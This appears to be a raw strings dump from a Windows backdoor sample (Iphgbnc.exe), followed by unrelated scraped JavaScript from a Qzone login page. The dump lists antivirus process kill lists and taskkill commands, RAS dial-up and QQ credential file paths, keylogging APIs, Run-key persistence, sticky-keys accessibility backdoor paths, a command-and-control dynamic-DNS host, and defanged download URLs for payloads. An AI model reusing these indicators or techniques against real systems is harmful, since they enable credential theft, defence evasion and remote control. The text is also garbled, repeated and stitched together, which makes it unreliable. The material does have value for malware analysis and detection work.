%SystemRoot%\system32\termsrvhack.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

TSDISCON %s

LOGOFF %s

taskkill /f /im cmd.exe

cmd.exe

taskkill /f /im taskmgr.exe

taskmgr.exe

taskkill /f /im regedit.exe

regedit.exe

taskkill /f /im mmc.exe

mmc.exe

taskkill /f /im mstsc.exe

mstsc.exe

taskkill /f /im QQ.exe

QQ.exe

taskkill /f /im Maxthon.exe

Maxthon.exe

taskkill /f /im Firefox.exe

Firefox.exe

taskkill /f /im Chrome.exe

Chrome.exe

taskkill /f /im sogouexplorer.exe

sogouexplorer.exe

taskkill /f /im 360SE.exe

360SE.exe

taskkill /f /im IEXPLORE.exe

IEXPLORE.exe

taskkill /f /im s.exe

s.exe

PortNumber

%d/%d

\cmd.exe

explorer.exe

All Users\Microsoft\Network\Connections\Pbk\rasphone.pbk

Microsoft\Network\Connections\pbk\rasphone.pbk

Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk

AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk

%s\%s

AppData\Roaming\Microsoft\Network\Connections\pbk\rasphone.pbk

%USERPROFILE%

RasDialParams!%s#0

Iphlpapi.dll

rasphone.pbk

\Application Data\Tencent\Users\*.*

\AppData\Roaming\Tencent\Users\*.*

/IP (%s)

Net123.dat

mgui.exe

mcagent.exe

Pavsrv50.exe

SHesvchost.exe

onlinent.exe

pasvc.exe

fsaa.exe

vba32ldr.exe

spider.exe

ccapp.exe

bdnagent.exe

MsMpEng.exe

v3lsvc.exe

AYAgent.aye

avgui.exe

baidusdSvc.exe

QQPCRTP.exe

ksafe.exe

rtvscan.exe

ashDisp.exe

avcenter.exe

pccmain.exe

knsdtray.exe

kxetray.exe

egui.exe

Mcshield.exe

RavMonD.exe

KvMonXP.exe

avp.exe

360sd.exe

360tray.exe

%d %c %d

1.1.4

xvid-1.3.2

%d st:%lld if:%d

XviDd%c

%Program Files%\Microsoft Iphgbn

12345678

qingxiaofeng.f3322.org

%Program Files%\Microsoft Iphgbn\Iphgbnc.exe

hXXp://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=%s

hXXp://VVV.ip138.com/ips138.asp?ip=%s&action=2

hXXp://dns.aizhan.com/?q=%s

Iphgbnc.exe

hXXp://180.97.221.181:8980/x.exe

~~}}}~~}}}

PeekNamedPipe

DisconnectNamedPipe

CreatePipe

WinExec

GetProcessHeap

GetWindowsDirectoryA

RegCreateKeyA

RegQueryInfoKeyA

RegCreateKeyExA

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyA

RegOpenKeyExA

RegCloseKey

ShellExecuteA

MapVirtualKeyA

keybd_event

UnhookWindowsHookEx

SetWindowsHookExA

GetKeyState

ExitWindowsEx

EnumWindows

InternetOpenUrlA

.text

`.rodata

`.rotext

`.rdata

@.data

.rsrc

@.reloc

""""$$$$&&&&((((****,,,,....00002222444466668888::::<<<<>>>>

#*1892 $

%,3:;4-&

'.5<=6/7>?

"#()01* $%&',-./2389:;4567<=>?

"*2:# 3;

$,4<%-5=

&.6>'/7?

iphlpapi.dll

lIngress.exe

arpguard.exe

zrclient.exe

zrupdate.exe

zreboot.exe

This user account is used by the Visual Studio .NET Debugger

ntdll.dll

Iphgbnc.exe_140:

.text

`.rdata

@.data

.rsrc

SSSSh

MFC42.DLL

MSVCRT.dll

_acmdln

GetProcessHeap

KERNEL32.dll

USER32.dll

Misql.exe

hXXp://180.97.221.181:64430/NetSyst96.dll

BcURlIB69hyFN7hYNmGysFYX3L0S6NMd3GYB1H8YTyhsOn24CaWTyZRx Nje4bdm1VpLMo94X3tKtShUB6rztFJVTCr46WR sL83/MrpMN/iLykL8rmehO54UJ SS/zGK1flwMdZAOigz5zxYHaIypxZF4MHgf0PgHdKNLLO3Cx/8VG7UKlMyR6AFXDtJa29lV6D9lYwlzrBC0vnBNswaDTy08rJXOP/Bw0qi1n 0PkQVqErH M5SkXfx/7smTRn39769hYKEW3LbKZEca/FRPfj8Bmkzul43H60Xw5RY5EQa4jeaWcgzHlT2JSkPMprWVhSL4zEFe/j5Vga9AWLrL5aCNIjJdyanpzfrlvRu2KOFY4tGwQlwJ  T4XAz7yn7PFjQGa6vfl/AlMCchhpuo9494uT4b pbtPKguWvYwKANhoot0/YDZxQ6jM9ZC618MpC1lFOu8BeayfAbidwOPywOxSUdy2gszCz6eTP dPgUP8QoTKGLjvHjCunxlxmvx48QnsK2tASuIV56egB8pkPAkdamot5Mz8MT5M=

%Program Files%\Mysqld\

Mysqld/1.0

WININET.dll

ch2=%d

ch1=%d

%Program Files%\Mysqld\NetSyst96.PNG

Allows TeamViewer to be run from a removable drive. For additional details, visit hXXp://portableappz.blogspot.com

PortableAppZ.blogspot.com

TeamViewer Portable

0.0.0.0

PortableAppZ is a Trademark of Bernat

TeamViewerPortable.exe

Iphgbnc.exe_140_rwx_10001000_00348000:

D$%SS

t;Jt%UQJPSt

@43434343

Jw2.Hw

deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly

inflate 1.1.4 Copyright 1995-2002 Mark Adler

This software is derived from the GNU GPL XviD codec (1.3.0).

Software\Microsoft\Windows\CurrentVersion\run

\StringFileInfo\%s\CompanyName

000%x

Software\Microsoft\Windows\CurrentVersion\Run

%d * %d:

(%d-d-d d:d:d)

<%s> %s

%d.%d.%d.%d

Ourlog

%s\*.*

%s%s%s

%s%s*.*

%Y-%m-%d %H:%M

%s : %u

InternalGetUdpTableWithOwnerPid

AllocateAndGetUdpExTableFromStack

InternalGetTcpTable2

AllocateAndGetTcpExTableFromStack

%d-%d-%d %d:%d:%d

hXXp://

\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat

\Local Settings\History\History.IE5\index.dat

%Y-%m-%d %H:%M:%S

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

\*.url

%sDocuments and Settings\%s\Favorites

%sUsers\%s\Favorites

192.168.1.2

GET %s HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

Referer: hXXp://%s:80/hXXp://%s

:] %s

:] %d-%d-%d %d:%d:%d

%s\dllcache\magnify.exe

%s\dllcache\osk.exe

%s\dllcache\sethc.exe

%s\magnify.exe

%s\osk.exe

%s\sethc.exe

\dllcache\termsrvhack.dll

\termsrvhack.dll

%SystemRoot%\system32\termsrvhack.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

TSDISCON %s

LOGOFF %s

taskkill /f /im cmd.exe

cmd.exe

taskkill /f /im taskmgr.exe

taskmgr.exe

taskkill /f /im regedit.exe

regedit.exe

taskkill /f /im mmc.exe

mmc.exe

taskkill /f /im mstsc.exe

mstsc.exe

taskkill /f /im QQ.exe

QQ.exe

taskkill /f /im Maxthon.exe

Maxthon.exe

taskkill /f /im Firefox.exe

Firefox.exe

taskkill /f /im Chrome.exe

Chrome.exe

taskkill /f /im sogouexplorer.exe

sogouexplorer.exe

taskkill /f /im 360SE.exe

360SE.exe

taskkill /f /im IEXPLORE.exe

IEXPLORE.exe

taskkill /f /im s.exe

s.exe

PortNumber

%d/%d

\cmd.exe

explorer.exe

All Users\Microsoft\Network\Connections\Pbk\rasphone.pbk

Microsoft\Network\Connections\pbk\rasphone.pbk

Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk

AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk

%s\%s

AppData\Roaming\Microsoft\Network\Connections\pbk\rasphone.pbk

%USERPROFILE%

RasDialParams!%s#0

Iphlpapi.dll

rasphone.pbk

\Application Data\Tencent\Users\*.*

\AppData\Roaming\Tencent\Users\*.*

/IP (%s)

Net123.dat

mgui.exe

mcagent.exe

Pavsrv50.exe

SHesvchost.exe

onlinent.exe

pasvc.exe

fsaa.exe

vba32ldr.exe

spider.exe

ccapp.exe

bdnagent.exe

MsMpEng.exe

v3lsvc.exe

AYAgent.aye

avgui.exe

baidusdSvc.exe

QQPCRTP.exe

ksafe.exe

rtvscan.exe

ashDisp.exe

avcenter.exe

pccmain.exe

knsdtray.exe

kxetray.exe

egui.exe

Mcshield.exe

RavMonD.exe

KvMonXP.exe

avp.exe

360sd.exe

360tray.exe

%d %c %d

1.1.4

xvid-1.3.2

%d st:%lld if:%d

XviDd%c

%Program Files%\Microsoft Iphgbn

12345678

qingxiaofeng.f3322.org

%Program Files%\Microsoft Iphgbn\Iphgbnc.exe

hXXp://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=%s

hXXp://VVV.ip138.com/ips138.asp?ip=%s&action=2

hXXp://dns.aizhan.com/?q=%s

<meta http-equiv="content-type" content="text/html; charset=UTF-8" />

<meta http-equiv="X-UA-Compatible" content="IE=edge">

<meta name="keywords" content="QQ??,qzone,??,??,??,??,??,??,??,??,qq??,qq??,????,????" />

<link rel="apple-touch-icon" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad-retina.png">

<link rel="apple-touch-icon" sizes="76x76" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad.png">

<link rel="apple-touch-icon" sizes="120x120" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-iphone-retina.png">

<link rel="apple-touch-icon" sizes="152x152" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad-retina.png">

<link rel="icon" sizes="any" mask href="hXXps://qzonestyle.gtimg.cn/qzone/v8/img/Qzone.svg">

(function(){try{if(parent!=self && (parent.document.domain!=document.domain || (document.referrer && !/^http(s)?:\/\/[.\w-] \.qq\.com\//i.test(document.referrer)))){throw new Error("can't be iframed");}}catch(e){debugger;window.open(location.href, "_top");}})();

????? ????URL??????

var getParameter = function(url, name){

m = url.match(r);

if(location.host == 'iamsinger.qzone.com'){

var getHttpParams = function(name, str){

var m = (str || location.href).match(r);

return decodeURIComponent(!m?"":m[2]).replace(/\ /g," ");

var g_sUA = navigator.userAgent.toLowerCase();

var android = g_sUA.match(/(android)\s ([\d.] )/);

var ios = g_sUA.match(/(ipad|iphone|ipod).*os\s([\d_] )/);

location.href = '//m.qzone.com/l?sid=' getHttpParams('sid') '&g_f=' getHttpParams('g_f') '&groupid=17&g=145';

location.href = '//rc.qzone.qq.com/myhome?action=auto_popup_checkin&checkin_groupid=17&checkin_source=song';

if(location.href.indexOf('qzone.qq.com/app') > -1){

location.href = "//my.qzone.qq.com/";

}else if(location.href.indexOf('qzone.com') > -1){

location.href = "//qzone.qq.com/";

var ua = navigator.userAgent,mat = ua.match(/(iPhone|iPod|android|symbian)/i);

location.replace('//m.qzone.com/');

document.domain = "qq.com";

var r = new RegExp("(?:^|; |\\s )"   n   "=([^;]*)"),m = document.cookie.match(r);

expire.setTime(expire.getTime()   3600000 * hour);

document.cookie = name   "="   value   "; "   (hour?("expires="   expire.toGMTString()   "; "):"")   (path?("path="   path   "; "):"path=/; ")   (domain?("domain="   domain   ";"):("domain=qq.com;"));

return obj === null?'null':(obj === undefined?'undefined':Object.prototype.toString.call(obj).slice(8,-1).toLowerCase());

var ref = document.referrer || location.href;

if(ref.indexOf("://") < 1){

ref = location.protocol   "//"   location.host   (ref.indexOf("/") == 0?"":location.pathname.substr(0,location.pathname.lastIndexOf("/")   1))   ref;

var depart = ref.split("://");

if(getType(depart) == "array" && depart.length > 1 && (/^[a-zA-Z] $/).test(depart[0])){

var h = depart[1].split("/");

setCookie('_qz_referrer',h[0],'qq.com',"/",0.1);

var _su,suin,checklogin_r = /\D/g;

suin = (_su = getCookie('uin').replace(checklogin_r,'') - 0) && getCookie('p_skey') && _su > 10000 && _su || 0;

var qq = getParameter(location.href, 'qzoneInIframe'),

url = '//user.qzone.qq.com/'   suin;

url = url   '?qzoneInIframe='   qq;

location.href = url;

var jumpurl = window.location.protocol   '//qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone',p_smallPic = '',p_smallUrl = '',p_bgPics = [],p_bgPic = [];

return document.getElementById(id);

function ptlogin2_onResize(width,height){

login_wnd = document.getElementById("login_div");

if(login_wnd){

login_wnd.style.width = width   "px";

login_wnd.style.height = height   "px";

login_wnd.style.visibility = "hidden"

login_wnd.style.visibility = "visible"

if (typeof window.postMessage !== 'undefined') {

window.onmessage = function(event) {

var msg = event || window.event;

data = JSON.parse(msg.data);

data = str2JSON(msg.data);

switch (data.action) {

ptlogin2_onClose && ptlogin2_onClose();

ptlogin2_onResize(data.width, data.height);

<link href="//qzonestyle.gtimg.cn/qzone_v6/proj_qzonelogin/qzonelogin.css?20130306" rel="stylesheet" media="screen" />

<link rel="Shortcut Icon" href="//qzonestyle.gtimg.cn/aoi/img/logo/favicon.ico?max_age=31536000" type="image/x-icon"/>

<div class="login_head">

<div class="login_img">

<a id="small_url" href="//i.qq.com/" tabindex="-1" onclick="TCISD.pv('ihome.qzone.qq.com','advertise');"></a>

<div class="login_wrap" id="login_div" style="height:316px;box-shadow:none;background:transparent">

<!--<iframe id="login_frame" height="100%" scrolling="auto" width="100%" frameborder="0" src="//ui.ptlogin2.qq.com/cgi-bin/login?daid=5&pt_qzone_sig=1&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=12&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=ÊÖ»úQQ¿Õ¼ä&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html"></iframe>-->

var url = location.search,

key = '',

if(url) {

url = url.substr(1);

queryArr =url.split('&');

for(var i = 0, len = queryArr.length; i < len; i  ) {

kvArr = queryArr[i].split('=');

if(kvArr.length >= 2) {

key = kvArr[0];

if('s_url' == key) {

if(value.search(/^https?:\/\/(.*)\.qzone\.qq\.com\//) == -1 && value.search(/^https?:\/\/(.*)\.qzone\.com\//) == -1 && value.search(/^https?:\/\/gameapp\.qq\.com\//) == -1 && value.search(/^https?:\/\/nextradio\.qq\.com\//) == -1) {//????,???qzone.qq.com?qzone.com??

value = encodeURIComponent('hXXps://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone');

value = encodeURIComponent('hXXps://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&specifyurl='   encodeURIComponent(value));

var pt_no_auth = location.href.indexOf('?fl=1')>-1 ? 1 : 0;

var src = 'hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=' encodeURIComponent('https:') '//qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url='   value   '&pt_qr_app=??QQ??&pt_qr_link=http://z.qzone.com/download.html&self_regurl=' encodeURIComponent('https:') '//qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html&pt_no_auth=' pt_no_auth;

document.write('<iframe id="login_frame" name="login_frame" height="100%" scrolling="no" width="100%" frameborder="0" src="'   src   '"></iframe>');

<div class="login_device">

<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.iphone');" target="_blank"><i class="ui_icon icon_iphone"></i><span>iPhone</span></a></li>

<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.ipad');" target="_blank"><i class="ui_icon icon_ipad"></i><span>iPad</span></a></li>

<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottome.qzone.qq.com','bottom.android');" target="_blank"><i class="ui_icon icon_android"></i><span>Android</span></a></li>

<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.windowsphone');" target="_blank"><i class="ui_icon icon_windowsphone"></i><span>Windows Phone</span></a></li>

<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.otherphone');" target="_blank"><i class="ui_icon icon_other"></i><span>????</span></a></li>

<a href="hXXp://support.qq.com/discuss/46_1.shtml" target="_blank" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.suggestion');">????</a> |

<a href="//qzone.qzone.qq.com/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.officialqzone');" target="_blank">????</a> |

<a href="//act.qzone.qq.com/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.actqzone');" target="_blank">????</a> |

<a href="//my.qzone.qq.com/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.app');" target="_blank">????</a> |

<a href="//user.qzonser.qzone.qq.com/949589999/main" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.original');" target="_blank">?????</a> |

<a href="hXXp://connect.qq.com/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.connect');" target="_blank">QQ??</a> |

<a href="hXXp://connect.qq.com/intro/login/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.qqlogin');" target="_blank">QQ??</a> |

<a href="hXXp://connect.qq.com/intro/share/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.socialpackage');" target="_blank">????</a> |

<a href="hXXp://wiki.open.qq.com/wiki/æŠ•è¯‰æŒ‡å¼•" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.complaint');" target="_blank">??????</a> |

<a href="hXXp://wiki.open.qq.com/wiki/Tencent_Open_Platform_Complaint_Guidelines" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.complaint_guildlines');" target="_blank">Complaint Guidelines</a>

</p> <p class="copyright_en">Copyright © 2005 - 2017 Tencent.<a target="_blank" href="hXXp://VVV.tencent.com/en-us/le/copyrightstatement.shtml">All Rights Reserved.</a></p>

<p class="copyright_cn">???? <a href="hXXp://VVV.tencent.com/law/mo_law.shtml?/law/copyright.htm" target="_blank">????</a> <a href="hXXp://VVV.qq.com/culture.shtml" target="_blank">???[2014]0633-233?</a></p>

<script type="text/javascript" src="//tajs.qq.com/stats?sId=52955029" charset="UTF-8"></script>

styleList = params.list || [];

<script type="text/javascript" src="//qzonestyle.gtimg.cn/qzone/qzactStatics/configSystem/data/179/config1.js"></script>

if(styleList.length === 0){

styleList.push({

bg : "//qzs.qq.com/qzone/v6/v6_config/upload/upfile_1759896_1352170422.jpg",

bg : "//qzs.qq.com/qzone/v6/v6_config/upload/upfile_1998047_1352170438.jpg"

bg : "//qzs.qq.com/qzone/v6/v6_config/upload/upfile_2040396_1352170450.jpg"

var randomData = Math.floor(Math.random() * styleList.length);

window.QZFL = window.QZFL || {};

QZFL.pingSender = function(url,t,opts){

var _s = QZFL.pingSender,iid,img;

if(!url){

img.iid = iid;

img.onload = img.onerror = img.ontimeout = (function(t){

evt = evt || window.event || {type:'timeout'};

void(typeof(opts[evt.type]) == 'function'?setTimeout((function(et,ti){

opts[et]({'type':et,'duration':((new Date()).getTime() - ti)});

})(evt.type,t._s_),0):0);

QZFL.pingSender._clearFn(evt,t);

(typeof(opts.timeout) == 'function') && setTimeout(function(){

img.ontimeout && img.ontimeout({type:'timeout'});

},(typeof(opts.timeoutValue) == 'number'?Math.max(100,opts.timeoutValue):5000));

img._s_ = (new Date()).getTime();

img.src = url;

},(t = Math.max(0,t))):(img.src = url));

QZFL.pingSender._sndPool = {};

QZFL.pingSender._sndCount = 0;

QZFL.pingSender._clearFn = function(evt,ref){

var _s = QZFL.pingSender;

_s._sndPool[ref.iid] = ref.onload = ref.onerror = ref.ontimeout = ref._s_ = null;

delete _s._sndPool[ref.iid];

if(typeof(window.TCISD) == "undefined"){

window.TCISD = {};

TCISD.pv = function(sDomain,path,opts){

TCISD.pv.send(sDomain,path,opts);

var pvSender = {send:function(domain,url,rDomain,rUrl){

items.push({dm:domain,url:url,rdm:rDomain || "",rurl:rUrl || ""});

timer = setTimeout(pvSender.doSend,5000);

if(items.length){

var url;

for(var i = 0;i < items.length;i  ){

url = pvSender.getUrl(items.slice(0,items.length - i));

if(url.length < 2000){

items = items.slice(Math.max(items.length - i,1));

timer = setTimeout(pvSender.doSend,5000);

QZFL.pingSender(url);

},getUrl:function(list){

var data = {dm:escape(item.dm),url:escape(item.url),rdm:escape(item.rdm),rurl:escape(item.rurl),pgv_pvid:pvSender.getId(),sds:Math.random()};

for(var i = 1;i < list.length;i  ){

ext.push([escape(p.dm),escape(p.url),escape(p.rdm),escape(p.rurl)].join(":"));

if(ext.length){

data.ex_dm = ext.join(";")

param.push(p   "="   data[p]);

var url = [TCISD.pv.config.webServerInterfaceURL,"?cc=-&ct=-&java=1&lang=-&pf=-&scl=-&scr=-&tt=-&tz=-8&vs=3.3&flash=&",param.join("&")].join("");

return url;

t = document.cookie.match(TCISD.pv._cookieP);

if(t && t.length && t.length > 1){

d = (Math.round(Math.random() * 2147483647) * (new Date().getUTCMilliseconds())) % 10000000000;

document.cookie = "pgv_pvid="   d   "; path=/; domain=qq.com; expires=Sun, 18 Jan 2038 00:00:00 GMT;";

h = document.cookie.match(TCISD.pv._cookieSSID);

f = (Math.round(Math.random() * 2147483647) * (new Date().getUTCMilliseconds())) % 10000000000;

document.cookie = "pgv_info=ssid=s"   f   "; path=/; domain=qq.com;";

TCISD.pv.send = function(sDomain,path,opts){

sDomain = sDomain || location.hostname || "-";

path = path || location.pathname;

opts.referURL = opts.referURL || document.referrer;

t = opts.referURL.split(TCISD.pv._urlSpliter);

t = t.split("/");

r = "/"   t.slice(3).join("/");

opts.referDomain = opts.referDomain || d;

opts.referPath = opts.referPath || r;

pvSender.send(sDomain,path,opts.referDomain,opts.referPath);

TCISD.pv._urlSpliter = /[\?\#]/;

TCISD.pv._cookieP = /(?:^|; |\s )pgv_pvid=([^;]*)/i;

TCISD.pv._cookieSSID = /(?:^|; |\s )pgv_info=([^;]*)/i;

TCISD.pv.config = {webServerInterfaceURL:"//pingfore.qq.com/pingd"};

window.TCISD = window.TCISD || {};

TCISD.createTimeStat = function(statName,flagArr,standardData){

var _s = TCISD.TimeStat,t,instance;

flagArr = flagArr || _s.config.defaultFlagArray;

t = flagArr.join("_");

TCISD.markTime = function(timeStampSeq,statName,flagArr,timeObj){

var ins = TCISD.createTimeStat(statName,flagArr);

ins.mark(timeStampSeq,timeObj);

TCISD.TimeStat = function(statName,flags,standardData){

var _s = TCISD.TimeStat;

this.sName = statName;

this.flagStr = flags;

this.timeStamps = [null];

this.zero = _s.config.zero;

this.standard = standardData;

TCISD.TimeStat.prototype.getData = function(seq){

if(seq && (t = this.timeStamps[seq])){

d.setTime(this.zero.getTime());

r.zero = d;

d.setTime(t.getTime());

r.time = d;

r.duration = t - this.zero;

if(this.standard && (d = this.standard.timeStamps[seq])){

r.delayRate = (r.duration - d) / d;

r.timeStamps = TCISD.TimeStat._cloneData(this.timeStamps);

TCISD.TimeStat._cloneData = function(obj){

var res = obj.sort?[]:{};

res[i] = TCISD.TimeStat._cloneData(obj[i]);

TCISD.TimeStat.prototype.mark = function(seq,timeObj){

seq = seq || this.timeStamps.length;

this.timeStamps[Math.min(Math.abs(seq),99)] = timeObj || (new Date());

TCISD.TimeStat.prototype.merge = function(baseTimeStat){

if(baseTimeStat && (typeof(baseTimeStat.timeStamps) == "object") && baseTimeStat.timeStamps.length){

this.timeStamps = baseTimeStat.timeStamps.concat(this.timeStamps.slice(1));

if(baseTimeStat.standard && (x = baseTimeStat.standard.timeStamps)){

if(!this.standard){

this.standard = {};

if(!(y = this.standard.timeStamps)){

y = this.standard.timeStamps = {};

for(var key in x){

if(!y[key]){

y[key] = x[key];

TCISD.TimeStat.prototype.setZero = function(od){

if(typeof(od) != "object" || typeof(od.getTime) != "function"){

this.zero this.zero = od;

TCISD.TimeStat.prototype.report = function(baseURL){

var _s = TCISD.TimeStat,url = [],t,z;

if((t = this.timeStamps).length < 1){

url.push((baseURL && baseURL.split("?")[0]) || _s.config.webServerInterfaceURL);

url.push("?");

z = this.zero;

for(var i = 1,len = t.length;i < len;  i){

url.push(i,"=",t[i].getTime?(t[i] - z):t[i],"&");

t = this.flagStr.split("_");

for(var i = 0,len = _s.config.maxFlagArrayLength;i < len;  i){

url.push("flag",i   1,"=",t[i],"&");

if(_s.pluginList && _s.pluginList.length){

for(var i = 0,len = _s.pluginList.length;i < len;  i){

(typeof(_s.pluginList[i]) == 'function') && _s.pluginList[i](url);

url.push("sds=",Math.random());

QZFL.pingSender && QZFL.pingSender(url.join(""));

TCISD.TimeStat._instances = {};

TCISD.TimeStat._count = 0;

TCISD.TimeStat.config = {webServerInterfaceURL:"//isdspeed.qq.com/cgi-bin/r.cgi",defaultFlagArray:[175,115,1],maxFlagArrayLength:6,zero:window._s_ || (new Date())};

TCISD.valueStat = function(statId,resultType,returnValue,opts){

TCISD.valueStat.send(statId,resultType,returnValue,opts);

TCISD.valueStat.send = function(statId,resultType,returnValue,opts){

var _s = TCISD.valueStat,_c = _s.config,t = _c.defaultParams,p,url = [];

statId = statId || t.statId;

resultType = resultType || t.resultType;

returnValue = returnValue || t.returnValue;

if(typeof(opts.reportRate) != "number"){

opts.reportRate = 1;

opts.reportRate = Math.round(Math.max(opts.reportRate,1));

if(!opts.fixReportRateOnly && !TCISD.valueStat.config.reportAll && (opts.reportRate > 1 && (Math.random() * opts.reportRate) > 1)){

url.push((opts.reportURL || _c.webServerInterfaceURL),"?");

url.push("flag1=",statId,"&","flag2=",resultType,"&","flag3=",returnValue,"&","1=",(TCISD.valueStat.config.reportAll?1:opts.reportRate),"&","2=",opts.duration,"&");

if(typeof opts.extendField != 'undefined'){

url.push("4=",opts.extendField,"&");

QZFL.pingSender(url.join(""));

TCISD.valueStat.config = {webServerInterfaceURL:"//isdspeed.qq.com/cgi-bin/v.cgi",defaultParams:{statId:1,resultType:1,returnValue:11,reportRate:1,duration:1000},reportAll:false};

TCISD.hotClick = TCISD.hotClick || function(tag,domain,url,opt){

TCISD.hotClick.send(tag,domain,url,opt);

TCISD.hotClick.send = function(tag,domain,url,opt){

var _s = TCISD.hotClick,x = opt.x || 9999,y = opt.y || 9999,doc = opt.doc || document,w = doc.parentWindow || doc.defaultView,p = w._hotClick_params || {};

url = url || p.url || w.location.pathname || "-";

domain = domain || p.domain || w.location.hostname || "-";

if(!_s.isReport()){

url = [_s.config.webServerInterfaceURL,"?dm=",domain   ".hot","&url=",escape(url),"&tt=-","&hottag=",tag,"&hotx=",x,"&hoty=",y,"&rand=",Math.random()];

TCISD.hotClick._arrSend = function(arr,doc){

for(var i = 0,len = arr.length;i < len;i  ){

TCISD.hotClick.send(arr[i].tag,arr[i].domain,arr[i].url,{doc:doc});

TCISD.hotClick.click = function(event,doc){

var _s = TCISD.hotClick,tags = _s.getTags(QZFL.event.getTarget(event),doc);

TCISD.hotClick.getTags = function(dom,doc){

var _s = TCISD.hotClick,tags = [],w = doc.parentWindow || doc.defaultView,rules = w._hotClick_params.rules,t;

for(var i = 0,len = rules.length;i < len;i  ){

tags.push(t);

TCISD.hotClick.defaultRule = function(dom){

tag = dom.getAttribute("hottag");

if(tag && tag.indexOf("|") > -1){

t = tag.split("|");

TCISD.hotClick.config = TCISD.hotClick.config || {webServerInterfaceURL:"//pinghot.qq.com/pingd",reportRate:1,domain:null,url:null};

TCISD.hotClick._reportRate = typeof TCISD.hotClick._reportRate == 'undefined'?-1:TCISD.hotClick._reportRate;

TCISD.hotClick.isReport = function(){

var _s = TCISD.hotClick,rate;

if(_s._reportRate != -1){

return _s._reportRate;

rate = Math.round(_s.config.reportRate);

if(rate > 1 && (Math.random() * rate) > 1){

return(_s._reportRate = 0);

return(_s._reportRate = 1);

TCISD.hotClick.setConfig = function(opt){

var _sc = TCISD.hotClick.config,doc = opt.doc || document,w = doc.parentWindow || doc.defaultView;

if(opt.domain){

w._hotClick_params.domain = opt.domain;

if(opt.url){

w._hotClick_params.url = opt.url;

if(opt.reportRate){

w._hotClick_params.reportRate = opt.reportRate;

TCISD.hotAddRule = function(handler,opt){

var _s = TCISD.hotClick,doc = opt.doc || document,w = doc.parentWindow || doc.defaultView;

w._hotClick_params.rules.push(handler);

return w._hotClick_params.rules;

TCISD.hotClickWatch = function(opt){

var _s = TCISD.hotClick,w,l,doc;

doc = opt.doc = opt.doc || document;

w = doc.parentWindow || doc.defaultView;

w._hotClick_params.rules = [_s.defaultRule];

_s.setConfig(opt);

w.QZFL.event.addEvent(doc,"click",_s.click,[doc]);

if(typeof(window.TCISD) == 'undefined'){

TCISD.stringStat = function(dataId,hashValue,opts){

TCISD.stringStat.send(dataId,hashValue,opts);

TCISD.stringStat.send = function(dataId,hashValue,opts){

var _s = TCISD.stringStat,_c = _s.config,t = _c.defaultParams,url = [],isPost = false,htmlParam,sd;

dataId = dataId || t.dataId;

isPost = (opts.method && opts.method == 'post')?true:false;

if(hashValue[i].length && hashValue[i].length > 1024){

hashValue[i] = hashValue[i].substring(0,1024);

if(typeof(opts.reportRate) != 'number'){

if(opts.reportRate > 1 && (Math.random() * opts.reportRate) > 1){

if(isPost && QZFL.FormSender){

hashValue.dataId = dataId;

hashValue.sds = Math.random();

var sd = new QZFL.FormSender(_c.webServerInterfaceURL,'post',hashValue,'UTF-8');

sd.send();

htmlParam = TCISD.stringStat.genHttpParamString(hashValue);

url.push(_c.webServerInterfaceURL,'?');

url.push('dataId=',dataId);

url.push('&',htmlParam,'&');

url.push('ted=',Math.random());

QZFL.pingSender(url.join(''));

